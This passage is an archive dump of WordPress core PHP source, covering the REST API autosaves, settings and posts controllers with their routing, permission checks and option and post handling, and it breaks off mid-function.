$new_autosave = _wp_post_revision_data( $post_data, true );
$new_autosave['ID'] = $old_autosave->ID;
$new_autosave['post_author'] = $user_id;
// If the new autosave has the same content as the post, delete the autosave.
$autosave_is_different = false;
foreach ( array_intersect( array_keys( $new_autosave ), array_keys( _wp_post_revision_fields( $post ) ) ) as $field ) {
if ( normalize_whitespace( $new_autosave[ $field ] ) != normalize_whitespace( $post->$field ) ) {
$autosave_is_different = true;
break;
}
}
if ( ! $autosave_is_different ) {
wp_delete_post_revision( $old_autosave->ID );
return new WP_Error( 'rest_autosave_no_changes', __( 'There is nothing to save. The autosave and the post content are the same.' ), array( 'status' => 400 ) );
}
/**
* This filter is documented in wp-admin/post.php.
*/
do_action( 'wp_creating_autosave', $new_autosave );
// wp_update_post expects escaped array.
return wp_update_post( wp_slash( $new_autosave ) );
}
// Create the new autosave as a special post revision.
return _wp_put_post_revision( $post_data, true );
}
/**
* Prepares the revision for the REST response.
*
* @since 5.0.0
*
* @param WP_Post $post Post revision object.
* @param WP_REST_Request $request Request object.
*
* @return WP_REST_Response Response object.
*/
public function prepare_item_for_response( $post, $request ) {
$response = $this->revisions_controller->prepare_item_for_response( $post, $request );
$fields = $this->get_fields_for_response( $request );
if ( in_array( 'preview_link', $fields, true ) ) {
$parent_id = wp_is_post_autosave( $post );
$preview_post_id = false === $parent_id ? $post->ID : $parent_id;
$preview_query_args = array();
if ( false !== $parent_id ) {
$preview_query_args['preview_id'] = $parent_id;
$preview_query_args['preview_nonce'] = wp_create_nonce( 'post_preview_' . $parent_id );
}
$response->data['preview_link'] = get_preview_post_link( $preview_post_id, $preview_query_args );
}
$context = ! empty( $request['context'] ) ? $request['context'] : 'view';
$response->data = $this->add_additional_fields_to_object( $response->data, $request );
$response->data = $this->filter_response_by_context( $response->data, $context );
/**
* Filters a revision returned from the API.
*
* Allows modification of the revision right before it is returned.
*
* @since 5.0.0
*
* @param WP_REST_Response $response The response object.
* @param WP_Post $post The original revision object.
* @param WP_REST_Request $request Request used to generate the response.
*/
return apply_filters( 'rest_prepare_autosave', $response, $post, $request );
}
/**
* Retrieves the query params for the autosaves collection.
*
* @since 5.0.0
*
* @return array Collection parameters.
*/
public function get_collection_params() {
return array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
);
}
}
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/class-wp-rest-settings-controller.php�����������������������������������������������������0000666�����������������00000023653�15111427772�0016027 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Settings_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core class used to manage a site's settings via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Controller
*/
class WP_REST_Settings_Controller extends WP_REST_Controller {
/**
* Constructor.
*
* @since 4.7.0
*/
public function __construct() {
$this->namespace = 'wp/v2';
$this->rest_base = 'settings';
}
/**
* Registers the routes for the objects of the controller.
*
* @since 4.7.0
*
* @see register_rest_route()
*/
public function register_routes() {
register_rest_route( $this->namespace, '/' . $this->rest_base, array(
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_item' ),
'args' => array(),
'permission_callback' => array( $this, 'get_item_permissions_check' ),
),
array(
'methods' => WP_REST_Server::EDITABLE,
'callback' => array( $this, 'update_item' ),
'args' => $this->get_endpoint_args_for_item_schema( WP_REST_Server::EDITABLE ),
'permission_callback' => array( $this, 'get_item_permissions_check' ),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
}
/**
* Checks if a given request has access to read and manage settings.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return bool True if the request has read access for the item, otherwise false.
*/
public function get_item_permissions_check( $request ) {
return current_user_can( 'manage_options' );
}
/**
* Retrieves the settings.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return array|WP_Error Array on success, or WP_Error object on failure.
*/
public function get_item( $request ) {
$options = $this->get_registered_options();
$response = array();
foreach ( $options as $name => $args ) {
/**
* Filters the value of a setting recognized by the REST API.
*
* Allow hijacking the setting value and overriding the built-in behavior by returning a
* non-null value. The returned value will be presented as the setting value instead.
*
* @since 4.7.0
*
* @param mixed $result Value to use for the requested setting. Can be a scalar
* matching the registered schema for the setting, or null to
* follow the default get_option() behavior.
* @param string $name Setting name (as shown in REST API responses).
* @param array $args Arguments passed to register_setting() for this setting.
*/
$response[ $name ] = apply_filters( 'rest_pre_get_setting', null, $name, $args );
if ( is_null( $response[ $name ] ) ) {
// Default to a null value as "null" in the response means "not set".
$response[ $name ] = get_option( $args['option_name'], $args['schema']['default'] );
}
/*
* Because get_option() is lossy, we have to
* cast values to the type they are registered with.
*/
$response[ $name ] = $this->prepare_value( $response[ $name ], $args['schema'] );
}
return $response;
}
/**
* Prepares a value for output based off a schema array.
*
* @since 4.7.0
*
* @param mixed $value Value to prepare.
* @param array $schema Schema to match.
* @return mixed The prepared value.
*/
protected function prepare_value( $value, $schema ) {
// If the value is not valid by the schema, set the value to null. Null
// values are specifcally non-destructive so this will not cause overwriting
// the current invalid value to null.
if ( is_wp_error( rest_validate_value_from_schema( $value, $schema ) ) ) {
return null;
}
return rest_sanitize_value_from_schema( $value, $schema );
}
/**
* Updates settings for the settings object.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return array|WP_Error Array on success, or error object on failure.
*/
public function update_item( $request ) {
$options = $this->get_registered_options();
$params = $request->get_params();
foreach ( $options as $name => $args ) {
if ( ! array_key_exists( $name, $params ) ) {
continue;
}
/**
* Filters whether to preempt a setting value update.
*
* Allows hijacking the setting update logic and overriding the built-in behavior by
* returning true.
*
* @since 4.7.0
*
* @param bool $result Whether to override the default behavior for updating the
* value of a setting.
* @param string $name Setting name (as shown in REST API responses).
* @param mixed $value Updated setting value.
* @param array $args Arguments passed to register_setting() for this setting.
*/
$updated = apply_filters( 'rest_pre_update_setting', false, $name, $request[ $name ], $args );
if ( $updated ) {
continue;
}
/*
* A null value for an option would have the same effect as
* deleting the option from the database, and relying on the
* default value.
*/
if ( is_null( $request[ $name ] ) ) {
/*
* A null value is returned in the response for any option
* that has a non-scalar value.
*
* To protect clients from accidentally including the null
* values from a response object in a request, we do not allow
* options with values that don't pass validation to be updated to null.
* Without this added protection a client could mistakenly
* delete all options that have invalid values from the
* database.
*/
if ( is_wp_error( rest_validate_value_from_schema( get_option( $args['option_name'], false ), $args['schema'] ) ) ) {
return new WP_Error(
'rest_invalid_stored_value', sprintf( __( 'The %s property has an invalid stored value, and cannot be updated to null.' ), $name ), array( 'status' => 500 )
);
}
delete_option( $args['option_name'] );
} else {
update_option( $args['option_name'], $request[ $name ] );
}
}
return $this->get_item( $request );
}
/**
* Retrieves all of the registered options for the Settings API.
*
* @since 4.7.0
*
* @return array Array of registered options.
*/
protected function get_registered_options() {
$rest_options = array();
foreach ( get_registered_settings() as $name => $args ) {
if ( empty( $args['show_in_rest'] ) ) {
continue;
}
$rest_args = array();
if ( is_array( $args['show_in_rest'] ) ) {
$rest_args = $args['show_in_rest'];
}
$defaults = array(
'name' => ! empty( $rest_args['name'] ) ? $rest_args['name'] : $name,
'schema' => array(),
);
$rest_args = array_merge( $defaults, $rest_args );
$default_schema = array(
'type' => empty( $args['type'] ) ? null : $args['type'],
'description' => empty( $args['description'] ) ? '' : $args['description'],
'default' => isset( $args['default'] ) ? $args['default'] : null,
);
$rest_args['schema'] = array_merge( $default_schema, $rest_args['schema'] );
$rest_args['option_name'] = $name;
// Skip over settings that don't have a defined type in the schema.
if ( empty( $rest_args['schema']['type'] ) ) {
continue;
}
/*
* Whitelist the supported types for settings, as we don't want invalid types
* to be updated with arbitrary values that we can't do decent sanitizing for.
*/
if ( ! in_array( $rest_args['schema']['type'], array( 'number', 'integer', 'string', 'boolean', 'array', 'object' ), true ) ) {
continue;
}
$rest_args['schema'] = $this->set_additional_properties_to_false( $rest_args['schema'] );
$rest_options[ $rest_args['name'] ] = $rest_args;
}
return $rest_options;
}
/**
* Retrieves the site setting schema, conforming to JSON Schema.
*
* @since 4.7.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
$options = $this->get_registered_options();
$schema = array(
'$schema' => 'http://json-schema.org/draft-04/schema#',
'title' => 'settings',
'type' => 'object',
'properties' => array(),
);
foreach ( $options as $option_name => $option ) {
$schema['properties'][ $option_name ] = $option['schema'];
$schema['properties'][ $option_name ]['arg_options'] = array(
'sanitize_callback' => array( $this, 'sanitize_callback' ),
);
}
return $this->add_additional_fields_schema( $schema );
}
/**
* Custom sanitize callback used for all options to allow the use of 'null'.
*
* By default, the schema of settings will throw an error if a value is set to
* `null` as it's not a valid value for something like "type => string". We
* provide a wrapper sanitizer to whitelist the use of `null`.
*
* @since 4.7.0
*
* @param mixed $value The value for the setting.
* @param WP_REST_Request $request The request object.
* @param string $param The parameter name.
* @return mixed|WP_Error
*/
public function sanitize_callback( $value, $request, $param ) {
if ( is_null( $value ) ) {
return $value;
}
return rest_parse_request_arg( $value, $request, $param );
}
/**
* Recursively add additionalProperties = false to all objects in a schema.
*
* This is need to restrict properties of objects in settings values to only
* registered items, as the REST API will allow additional properties by
* default.
*
* @since 4.9.0
*
* @param array $schema The schema array.
* @return array
*/
protected function set_additional_properties_to_false( $schema ) {
switch ( $schema['type'] ) {
case 'object':
foreach ( $schema['properties'] as $key => $child_schema ) {
$schema['properties'][ $key ] = $this->set_additional_properties_to_false( $child_schema );
}
$schema['additionalProperties'] = false;
break;
case 'array':
$schema['items'] = $this->set_additional_properties_to_false( $schema['items'] );
break;
}
return $schema;
}
}
�������������������������������������������������������������������������������������endpoints/class-wp-rest-posts-controller.php��������������������������������������������������������0000666�����������������00000243446�15111427772�0015343 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Posts_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core class to access posts via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Controller
*/
class WP_REST_Posts_Controller extends WP_REST_Controller {
/**
* Post type.
*
* @since 4.7.0
* @var string
*/
protected $post_type;
/**
* Instance of a post meta fields object.
*
* @since 4.7.0
* @var WP_REST_Post_Meta_Fields
*/
protected $meta;
/**
* Passwordless post access permitted.
*
* @since 5.7.1
* @var int[]
*/
protected $password_check_passed = array();
/**
* Constructor.
*
* @since 4.7.0
*
* @param string $post_type Post type.
*/
public function __construct( $post_type ) {
$this->post_type = $post_type;
$this->namespace = 'wp/v2';
$obj = get_post_type_object( $post_type );
$this->rest_base = ! empty( $obj->rest_base ) ? $obj->rest_base : $obj->name;
$this->meta = new WP_REST_Post_Meta_Fields( $this->post_type );
}
/**
* Registers the routes for the objects of the controller.
*
* @since 4.7.0
*
* @see register_rest_route()
*/
public function register_routes() {
register_rest_route( $this->namespace, '/' . $this->rest_base, array(
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_items' ),
'permission_callback' => array( $this, 'get_items_permissions_check' ),
'args' => $this->get_collection_params(),
),
array(
'methods' => WP_REST_Server::CREATABLE,
'callback' => array( $this, 'create_item' ),
'permission_callback' => array( $this, 'create_item_permissions_check' ),
'args' => $this->get_endpoint_args_for_item_schema( WP_REST_Server::CREATABLE ),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
$schema = $this->get_item_schema();
$get_item_args = array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
);
if ( isset( $schema['properties']['password'] ) ) {
$get_item_args['password'] = array(
'description' => __( 'The password for the post if it is password protected.' ),
'type' => 'string',
);
}
register_rest_route( $this->namespace, '/' . $this->rest_base . '/(?P<id>[\d]+)', array(
'args' => array(
'id' => array(
'description' => __( 'Unique identifier for the object.' ),
'type' => 'integer',
),
),
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_item' ),
'permission_callback' => array( $this, 'get_item_permissions_check' ),
'args' => $get_item_args,
),
array(
'methods' => WP_REST_Server::EDITABLE,
'callback' => array( $this, 'update_item' ),
'permission_callback' => array( $this, 'update_item_permissions_check' ),
'args' => $this->get_endpoint_args_for_item_schema( WP_REST_Server::EDITABLE ),
),
array(
'methods' => WP_REST_Server::DELETABLE,
'callback' => array( $this, 'delete_item' ),
'permission_callback' => array( $this, 'delete_item_permissions_check' ),
'args' => array(
'force' => array(
'type' => 'boolean',
'default' => false,
'description' => __( 'Whether to bypass trash and force deletion.' ),
),
),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
}
/**
* Checks if a given request has access to read posts.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has read access, WP_Error object otherwise.
*/
public function get_items_permissions_check( $request ) {
$post_type = get_post_type_object( $this->post_type );
if ( 'edit' === $request['context'] && ! current_user_can( $post_type->cap->edit_posts ) ) {
return new WP_Error( 'rest_forbidden_context', __( 'Sorry, you are not allowed to edit posts in this post type.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Override the result of the post password check for REST requested posts.
*
* Allow users to read the content of password protected posts if they have
* previously passed a permission check or if they have the `edit_post` capability
* for the post being checked.
*
* @since 5.7.1
*
* @param bool $required Whether the post requires a password check.
* @param WP_Post $post The post been password checked.
* @return bool Result of password check taking in to account REST API considerations.
*/
public function check_password_required( $required, $post ) {
if ( ! $required ) {
return $required;
}
$post = get_post( $post );
if ( ! $post ) {
return $required;
}
if ( ! empty( $this->password_check_passed[ $post->ID ] ) ) {
// Password previously checked and approved.
return false;
}
return ! current_user_can( 'edit_post', $post->ID );
}
/**
* Retrieves a collection of posts.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_items( $request ) {
// Ensure a search string is set in case the orderby is set to 'relevance'.
if ( ! empty( $request['orderby'] ) && 'relevance' === $request['orderby'] && empty( $request['search'] ) ) {
return new WP_Error( 'rest_no_search_term_defined', __( 'You need to define a search term to order by relevance.' ), array( 'status' => 400 ) );
}
// Ensure an include parameter is set in case the orderby is set to 'include'.
if ( ! empty( $request['orderby'] ) && 'include' === $request['orderby'] && empty( $request['include'] ) ) {
return new WP_Error( 'rest_orderby_include_missing_include', __( 'You need to define an include parameter to order by include.' ), array( 'status' => 400 ) );
}
// Retrieve the list of registered collection query parameters.
$registered = $this->get_collection_params();
$args = array();
/*
* This array defines mappings between public API query parameters whose
* values are accepted as-passed, and their internal WP_Query parameter
* name equivalents (some are the same). Only values which are also
* present in $registered will be set.
*/
$parameter_mappings = array(
'author' => 'author__in',
'author_exclude' => 'author__not_in',
'exclude' => 'post__not_in',
'include' => 'post__in',
'menu_order' => 'menu_order',
'offset' => 'offset',
'order' => 'order',
'orderby' => 'orderby',
'page' => 'paged',
'parent' => 'post_parent__in',
'parent_exclude' => 'post_parent__not_in',
'search' => 's',
'slug' => 'post_name__in',
'status' => 'post_status',
);
/*
* For each known parameter which is both registered and present in the request,
* set the parameter's value on the query $args.
*/
foreach ( $parameter_mappings as $api_param => $wp_param ) {
if ( isset( $registered[ $api_param ], $request[ $api_param ] ) ) {
$args[ $wp_param ] = $request[ $api_param ];
}
}
// Check for & assign any parameters which require special handling or setting.
$args['date_query'] = array();
// Set before into date query. Date query must be specified as an array of an array.
if ( isset( $registered['before'], $request['before'] ) ) {
$args['date_query'][0]['before'] = $request['before'];
}
// Set after into date query. Date query must be specified as an array of an array.
if ( isset( $registered['after'], $request['after'] ) ) {
$args['date_query'][0]['after'] = $request['after'];
}
// Ensure our per_page parameter overrides any provided posts_per_page filter.
if ( isset( $registered['per_page'] ) ) {
$args['posts_per_page'] = $request['per_page'];
}
if ( isset( $registered['sticky'], $request['sticky'] ) ) {
$sticky_posts = get_option( 'sticky_posts', array() );
if ( ! is_array( $sticky_posts ) ) {
$sticky_posts = array();
}
if ( $request['sticky'] ) {
/*
* As post__in will be used to only get sticky posts,
* we have to support the case where post__in was already
* specified.
*/
$args['post__in'] = $args['post__in'] ? array_intersect( $sticky_posts, $args['post__in'] ) : $sticky_posts;
/*
* If we intersected, but there are no post ids in common,
* WP_Query won't return "no posts" for post__in = array()
* so we have to fake it a bit.
*/
if ( ! $args['post__in'] ) {
$args['post__in'] = array( 0 );
}
} elseif ( $sticky_posts ) {
/*
* As post___not_in will be used to only get posts that
* are not sticky, we have to support the case where post__not_in
* was already specified.
*/
$args['post__not_in'] = array_merge( $args['post__not_in'], $sticky_posts );
}
}
// Force the post_type argument, since it's not a user input variable.
$args['post_type'] = $this->post_type;
/**
* Filters the query arguments for a request.
*
* Enables adding extra arguments or setting defaults for a post collection request.
*
* @since 4.7.0
*
* @link https://developer.wordpress.org/reference/classes/wp_query/
*
* @param array $args Key value array of query var to query value.
* @param WP_REST_Request $request The request used.
*/
$args = apply_filters( "rest_{$this->post_type}_query", $args, $request );
$query_args = $this->prepare_items_query( $args, $request );
$taxonomies = wp_list_filter( get_object_taxonomies( $this->post_type, 'objects' ), array( 'show_in_rest' => true ) );
foreach ( $taxonomies as $taxonomy ) {
$base = ! empty( $taxonomy->rest_base ) ? $taxonomy->rest_base : $taxonomy->name;
$tax_exclude = $base . '_exclude';
if ( ! empty( $request[ $base ] ) ) {
$query_args['tax_query'][] = array(
'taxonomy' => $taxonomy->name,
'field' => 'term_id',
'terms' => $request[ $base ],
'include_children' => false,
);
}
if ( ! empty( $request[ $tax_exclude ] ) ) {
$query_args['tax_query'][] = array(
'taxonomy' => $taxonomy->name,
'field' => 'term_id',
'terms' => $request[ $tax_exclude ],
'include_children' => false,
'operator' => 'NOT IN',
);
}
}
$posts_query = new WP_Query();
$query_result = $posts_query->query( $query_args );
// Allow access to all password protected posts if the context is edit.
if ( 'edit' === $request['context'] ) {
add_filter( 'post_password_required', array( $this, 'check_password_required' ), 10, 2 );
}
$posts = array();
foreach ( $query_result as $post ) {
if ( 'edit' === $request['context'] ) {
$permission = $this->check_update_permission( $post );
} else {
$permission = $this->check_read_permission( $post );
}
if ( ! $permission ) {
continue;
}
$data = $this->prepare_item_for_response( $post, $request );
$posts[] = $this->prepare_response_for_collection( $data );
}
// Reset filter.
if ( 'edit' === $request['context'] ) {
remove_filter( 'post_password_required', array( $this, 'check_password_required' ) );
}
$page = (int) $query_args['paged'];
$total_posts = $posts_query->found_posts;
if ( $total_posts < 1 ) {
// Out-of-bounds, run the query again without LIMIT for total count.
unset( $query_args['paged'] );
$count_query = new WP_Query();
$count_query->query( $query_args );
$total_posts = $count_query->found_posts;
}
$max_pages = ceil( $total_posts / (int) $posts_query->query_vars['posts_per_page'] );
if ( $page > $max_pages && $total_posts > 0 ) {
return new WP_Error( 'rest_post_invalid_page_number', __( 'The page number requested is larger than the number of pages available.' ), array( 'status' => 400 ) );
}
$response = rest_ensure_response( $posts );
$response->header( 'X-WP-Total', (int) $total_posts );
$response->header( 'X-WP-TotalPages', (int) $max_pages );
$request_params = $request->get_query_params();
$base = add_query_arg( $request_params, rest_url( sprintf( '%s/%s', $this->namespace, $this->rest_base ) ) );
if ( $page > 1 ) {
$prev_page = $page - 1;
if ( $prev_page > $max_pages ) {
$prev_page = $max_pages;
}
$prev_link = add_query_arg( 'page', $prev_page, $base );
$response->link_header( 'prev', $prev_link );
}
if ( $max_pages > $page ) {
$next_page = $page + 1;
$next_link = add_query_arg( 'page', $next_page, $base );
$response->link_header( 'next', $next_link );
}
return $response;
}
/**
* Get the post, if the ID is valid.
*
* @since 4.7.2
*
* @param int $id Supplied ID.
* @return WP_Post|WP_Error Post object if ID is valid, WP_Error otherwise.
*/
protected function get_post( $id ) {
$error = new WP_Error( 'rest_post_invalid_id', __( 'Invalid post ID.' ), array( 'status' => 404 ) );
if ( (int) $id <= 0 ) {
return $error;
}
$post = get_post( (int) $id );
if ( empty( $post ) || empty( $post->ID ) || $this->post_type !== $post->post_type ) {
return $error;
}
return $post;
}
/**
* Checks if a given request has access to read a post.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return bool|WP_Error True if the request has read access for the item, WP_Error object otherwise.
*/
public function get_item_permissions_check( $request ) {
$post = $this->get_post( $request['id'] );
if ( is_wp_error( $post ) ) {
return $post;
}
if ( 'edit' === $request['context'] && $post && ! $this->check_update_permission( $post ) ) {
return new WP_Error( 'rest_forbidden_context', __( 'Sorry, you are not allowed to edit this post.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( $post && ! empty( $request['password'] ) ) {
// Check post password, and return error if invalid.
if ( ! hash_equals( $post->post_password, $request['password'] ) ) {
return new WP_Error( 'rest_post_incorrect_password', __( 'Incorrect post password.' ), array( 'status' => 403 ) );
}
}
// Allow access to all password protected posts if the context is edit.
if ( 'edit' === $request['context'] ) {
add_filter( 'post_password_required', array( $this, 'check_password_required' ), 10, 2 );
}
if ( $post ) {
return $this->check_read_permission( $post );
}
return true;
}
/**
* Checks if the user can access password-protected content.
*
* This method determines whether we need to override the regular password
* check in core with a filter.
*
* @since 4.7.0
*
* @param WP_Post $post Post to check against.
* @param WP_REST_Request $request Request data to check.
* @return bool True if the user can access password-protected content, otherwise false.
*/
public function can_access_password_content( $post, $request ) {
if ( empty( $post->post_password ) ) {
// No filter required.
return false;
}
/*
* Users always gets access to password protected content in the edit
* context if they have the `edit_post` meta capability.
*/
if (
'edit' === $request['context'] &&
current_user_can( 'edit_post', $post->ID )
) {
return true;
}
// No password, no auth.
if ( empty( $request['password'] ) ) {
return false;
}
// Double-check the request password.
return hash_equals( $post->post_password, $request['password'] );
}
/**
* Retrieves a single post.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_item( $request ) {
$post = $this->get_post( $request['id'] );
if ( is_wp_error( $post ) ) {
return $post;
}
$data = $this->prepare_item_for_response( $post, $request );
$response = rest_ensure_response( $data );
if ( is_post_type_viewable( get_post_type_object( $post->post_type ) ) ) {
$response->link_header( 'alternate', get_permalink( $post->ID ), array( 'type' => 'text/html' ) );
}
return $response;
}
/**
* Checks if a given request has access to create a post.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has access to create items, WP_Error object otherwise.
*/
public function create_item_permissions_check( $request ) {
if ( ! empty( $request['id'] ) ) {
return new WP_Error( 'rest_post_exists', __( 'Cannot create existing post.' ), array( 'status' => 400 ) );
}
$post_type = get_post_type_object( $this->post_type );
if ( ! empty( $request['author'] ) && get_current_user_id() !== $request['author'] && ! current_user_can( $post_type->cap->edit_others_posts ) ) {
return new WP_Error( 'rest_cannot_edit_others', __( 'Sorry, you are not allowed to create posts as this user.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( ! empty( $request['sticky'] ) && ! current_user_can( $post_type->cap->edit_others_posts ) && ! current_user_can( $post_type->cap->publish_posts ) ) {
return new WP_Error( 'rest_cannot_assign_sticky', __( 'Sorry, you are not allowed to make posts sticky.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( ! current_user_can( $post_type->cap->create_posts ) ) {
return new WP_Error( 'rest_cannot_create', __( 'Sorry, you are not allowed to create posts as this user.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( ! $this->check_assign_terms_permission( $request ) ) {
return new WP_Error( 'rest_cannot_assign_term', __( 'Sorry, you are not allowed to assign the provided terms.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Creates a single post.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function create_item( $request ) {
if ( ! empty( $request['id'] ) ) {
return new WP_Error( 'rest_post_exists', __( 'Cannot create existing post.' ), array( 'status' => 400 ) );
}
$prepared_post = $this->prepare_item_for_database( $request );
if ( is_wp_error( $prepared_post ) ) {
return $prepared_post;
}
$prepared_post->post_type = $this->post_type;
$post_id = wp_insert_post( wp_slash( (array) $prepared_post ), true );
if ( is_wp_error( $post_id ) ) {
if ( 'db_insert_error' === $post_id->get_error_code() ) {
$post_id->add_data( array( 'status' => 500 ) );
} else {
$post_id->add_data( array( 'status' => 400 ) );
}
return $post_id;
}
$post = get_post( $post_id );
/**
* Fires after a single post is created or updated via the REST API.
*
* The dynamic portion of the hook name, `$this->post_type`, refers to the post type slug.
*
* @since 4.7.0
*
* @param WP_Post $post Inserted or updated post object.
* @param WP_REST_Request $request Request object.
* @param bool $creating True when creating a post, false when updating.
*/
do_action( "rest_insert_{$this->post_type}", $post, $request, true );
$schema = $this->get_item_schema();
if ( ! empty( $schema['properties']['sticky'] ) ) {
if ( ! empty( $request['sticky'] ) ) {
stick_post( $post_id );
} else {
unstick_post( $post_id );
}
}
if ( ! empty( $schema['properties']['featured_media'] ) && isset( $request['featured_media'] ) ) {
$this->handle_featured_media( $request['featured_media'], $post_id );
}
if ( ! empty( $schema['properties']['format'] ) && ! empty( $request['format'] ) ) {
set_post_format( $post, $request['format'] );
}
if ( ! empty( $schema['properties']['template'] ) && isset( $request['template'] ) ) {
$this->handle_template( $request['template'], $post_id, true );
}
$terms_update = $this->handle_terms( $post_id, $request );
if ( is_wp_error( $terms_update ) ) {
return $terms_update;
}
if ( ! empty( $schema['properties']['meta'] ) && isset( $request['meta'] ) ) {
$meta_update = $this->meta->update_value( $request['meta'], $post_id );
if ( is_wp_error( $meta_update ) ) {
return $meta_update;
}
}
$post = get_post( $post_id );
$fields_update = $this->update_additional_fields_for_object( $post, $request );
if ( is_wp_error( $fields_update ) ) {
return $fields_update;
}
$request->set_param( 'context', 'edit' );
/**
* Fires after a single post is completely created or updated via the REST API.
*
* The dynamic portion of the hook name, `$this->post_type`, refers to the post type slug.
*
* @since 5.0.0
*
* @param WP_Post $post Inserted or updated post object.
* @param WP_REST_Request $request Request object.
* @param bool $creating True when creating a post, false when updating.
*/
do_action( "rest_after_insert_{$this->post_type}", $post, $request, true );
$response = $this->prepare_item_for_response( $post, $request );
$response = rest_ensure_response( $response );
$response->set_status( 201 );
$response->header( 'Location', rest_url( sprintf( '%s/%s/%d', $this->namespace, $this->rest_base, $post_id ) ) );
return $response;
}
/**
* Checks if a given request has access to update a post.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has access to update the item, WP_Error object otherwise.
*/
public function update_item_permissions_check( $request ) {
$post = $this->get_post( $request['id'] );
if ( is_wp_error( $post ) ) {
return $post;
}
$post_type = get_post_type_object( $this->post_type );
if ( $post && ! $this->check_update_permission( $post ) ) {
return new WP_Error( 'rest_cannot_edit', __( 'Sorry, you are not allowed to edit this post.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( ! empty( $request['author'] ) && get_current_user_id() !== $request['author'] && ! current_user_can( $post_type->cap->edit_others_posts ) ) {
return new WP_Error( 'rest_cannot_edit_others', __( 'Sorry, you are not allowed to update posts as this user.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( ! empty( $request['sticky'] ) && ! current_user_can( $post_type->cap->edit_others_posts ) && ! current_user_can( $post_type->cap->publish_posts ) ) {
return new WP_Error( 'rest_cannot_assign_sticky', __( 'Sorry, you are not allowed to make posts sticky.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( ! $this->check_assign_terms_permission( $request ) ) {
return new WP_Error( 'rest_cannot_assign_term', __( 'Sorry, you are not allowed to assign the provided terms.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Updates a single post.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function update_item( $request ) {
$valid_check = $this->get_post( $request['id'] );
if ( is_wp_error( $valid_check ) ) {
return $valid_check;
}
$post = $this->prepare_item_for_database( $request );
if ( is_wp_error( $post ) ) {
return $post;
}
// convert the post object to an array, otherwise wp_update_post will expect non-escaped input.
$post_id = wp_update_post( wp_slash( (array) $post ), true );
if ( is_wp_error( $post_id ) ) {
if ( 'db_update_error' === $post_id->get_error_code() ) {
$post_id->add_data( array( 'status' => 500 ) );
} else {
$post_id->add_data( array( 'status' => 400 ) );
}
return $post_id;
}
$post = get_post( $post_id );
/** This action is documented in wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php */
do_action( "rest_insert_{$this->post_type}", $post, $request, false );
$schema = $this->get_item_schema();
if ( ! empty( $schema['properties']['format'] ) && ! empty( $request['format'] ) ) {
set_post_format( $post, $request['format'] );
}
if ( ! empty( $schema['properties']['featured_media'] ) && isset( $request['featured_media'] ) ) {
$this->handle_featured_media( $request['featured_media'], $post_id );
}
if ( ! empty( $schema['properties']['sticky'] ) && isset( $request['sticky'] ) ) {
if ( ! empty( $request['sticky'] ) ) {
stick_post( $post_id );
} else {
unstick_post( $post_id );
}
}
if ( ! empty( $schema['properties']['template'] ) && isset( $request['template'] ) ) {
$this->handle_template( $request['template'], $post->ID );
}
$terms_update = $this->handle_terms( $post->ID, $request );
if ( is_wp_error( $terms_update ) ) {
return $terms_update;
}
if ( ! empty( $schema['properties']['meta'] ) && isset( $request['meta'] ) ) {
$meta_update = $this->meta->update_value( $request['meta'], $post->ID );
if ( is_wp_error( $meta_update ) ) {
return $meta_update;
}
}
$post = get_post( $post_id );
$fields_update = $this->update_additional_fields_for_object( $post, $request );
if ( is_wp_error( $fields_update ) ) {
return $fields_update;
}
$request->set_param( 'context', 'edit' );
// Filter is fired in WP_REST_Attachments_Controller subclass.
if ( 'attachment' === $this->post_type ) {
$response = $this->prepare_item_for_response( $post, $request );
